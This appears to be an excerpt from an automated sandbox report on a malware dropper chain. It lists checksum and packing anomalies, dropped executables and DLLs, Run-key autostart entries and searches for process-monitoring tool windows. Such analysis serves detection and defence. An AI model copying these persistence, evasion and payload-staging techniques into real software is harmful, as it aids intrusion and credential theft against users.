Source: u1w30Wt[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x53987
Source: Y-Cleaner.exe.22.dr	Static PE information: real checksum: 0x0 should be: 0x170243
Source: graph.exe.9.dr	Static PE information: real checksum: 0x0 should be: 0x46f82
Source: FBFF.tmp.fcxcx.exe.20.dr	Static PE information: real checksum: 0x0 should be: 0x4c2ca
Source: dll[1].22.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
Source: dwVrTdy[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: random[2].exe1.7.dr	Static PE information: real checksum: 0x1c8d79 should be: 0x1c789b
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x3130ea should be: 0x30e978
Source: AzVRM7c.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: be08f59021.exe.7.dr	Static PE information: real checksum: 0x1ec2f5 should be: 0x1ef516
Source: dwVrTdy.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: random[1].exe.7.dr	Static PE information: real checksum: 0x1ec2f5 should be: 0x1ef516
Source: 3417.tmp.vvv.exe.20.dr	Static PE information: real checksum: 0x0 should be: 0x2f2df6
Source: t5abhIx.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: 2DB3A69DE7692371543510.exe.16.dr	Static PE information: real checksum: 0x0 should be: 0x53987
Source: u1w30Wt.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x53987
Source: t5abhIx[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: 9774053d4c.exe.7.dr	Static PE information: real checksum: 0x2b3972 should be: 0x2afd66
Source: file.exe	Static PE information: real checksum: 0x3130ea should be: 0x30e978
Source: soft[1].22.dr	Static PE information: real checksum: 0x0 should be: 0x170243
Source: Bunifu_UI_v1.5.3.dll.22.dr	Static PE information: real checksum: 0x0 should be: 0x400e1

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: sfctgzqb
Source: file.exe	Static PE information: section name: qkipfcli
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: sfctgzqb
Source: skotes.exe.0.dr	Static PE information: section name: qkipfcli
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[2].exe1.7.dr	Static PE information: section name:
Source: random[2].exe1.7.dr	Static PE information: section name: .idata
Source: random[2].exe1.7.dr	Static PE information: section name:
Source: random[2].exe1.7.dr	Static PE information: section name: tdoajogz
Source: random[2].exe1.7.dr	Static PE information: section name: xfulpslq
Source: random[2].exe1.7.dr	Static PE information: section name: .taggant
Source: d8d3046b98.exe.7.dr	Static PE information: section name:
Source: d8d3046b98.exe.7.dr	Static PE information: section name: .idata
Source: d8d3046b98.exe.7.dr	Static PE information: section name:
Source: d8d3046b98.exe.7.dr	Static PE information: section name: tdoajogz
Source: d8d3046b98.exe.7.dr	Static PE information: section name: xfulpslq
Source: d8d3046b98.exe.7.dr	Static PE information: section name: .taggant
Source: u1w30Wt[1].exe.7.dr	Static PE information: section name: .x64
Source: u1w30Wt.exe.7.dr	Static PE information: section name: .x64
Source: random[1].exe.7.dr	Static PE information: section name:
Source: random[1].exe.7.dr	Static PE information: section name: .idata
Source: random[1].exe.7.dr	Static PE information: section name:
Source: random[1].exe.7.dr	Static PE information: section name: ehftnwgk
Source: random[1].exe.7.dr	Static PE information: section name: unlnktmr
Source: random[1].exe.7.dr	Static PE information: section name: .taggant
Source: be08f59021.exe.7.dr	Static PE information: section name:
Source: be08f59021.exe.7.dr	Static PE information: section name: .idata
Source: be08f59021.exe.7.dr	Static PE information: section name:
Source: be08f59021.exe.7.dr	Static PE information: section name: ehftnwgk
Source: be08f59021.exe.7.dr	Static PE information: section name: unlnktmr
Source: be08f59021.exe.7.dr	Static PE information: section name: .taggant
Source: random[1].exe1.7.dr	Static PE information: section name:
Source: random[1].exe1.7.dr	Static PE information: section name: .idata
Source: random[1].exe1.7.dr	Static PE information: section name: nwmnxdbs
Source: random[1].exe1.7.dr	Static PE information: section name: esrtnfgg
Source: random[1].exe1.7.dr	Static PE information: section name: .taggant
Source: 9774053d4c.exe.7.dr	Static PE information: section name:
Source: 9774053d4c.exe.7.dr	Static PE information: section name: .idata
Source: 9774053d4c.exe.7.dr	Static PE information: section name: nwmnxdbs
Source: 9774053d4c.exe.7.dr	Static PE information: section name: esrtnfgg
Source: 9774053d4c.exe.7.dr	Static PE information: section name: .taggant
Source: 2DB3A69DE7692371543510.exe.16.dr	Static PE information: section name: .x64
Source: 3417.tmp.vvv.exe.20.dr	Static PE information: section name: UPX2

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025D91C push ecx; ret	0_2_0025D92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00251359 push es; ret	0_2_0025135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FCD91C push ecx; ret	2_2_00FCD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FCD91C push ecx; ret	3_2_00FCD92F

Source: file.exe	Static PE information: section name: entropy: 7.111669260859514
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.111669260859514
Source: random[2].exe1.7.dr	Static PE information: section name: tdoajogz entropy: 7.9526002407712415
Source: d8d3046b98.exe.7.dr	Static PE information: section name: tdoajogz entropy: 7.9526002407712415
Source: random[1].exe.7.dr	Static PE information: section name: ehftnwgk entropy: 7.94243036954353
Source: be08f59021.exe.7.dr	Static PE information: section name: ehftnwgk entropy: 7.94243036954353
Source: random[1].exe1.7.dr	Static PE information: section name: entropy: 7.803165532767096
Source: 9774053d4c.exe.7.dr	Static PE information: section name: entropy: 7.803165532767096
Source: Y-Cleaner.exe.22.dr	Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].22.dr	Static PE information: section name: .text entropy: 7.918511524700298

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\dll[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\soft[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\python38.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\AzVRM7c[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\u1w30Wt[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	File created: C:\Program Files\Windows Media Player\graph\graph.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	File created: C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Y-Cleaner.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\t5abhIx[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014445001\182555961e.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	File created: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014446001\799e7330b8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\dwVrTdy[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	File created: C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3417.tmp.vvv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\dll[1]			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\soft[1]			Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 602c785fe5.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9774053d4c.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d8d3046b98.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Window searched: window name: PROCMON_WINDOW_CLASS
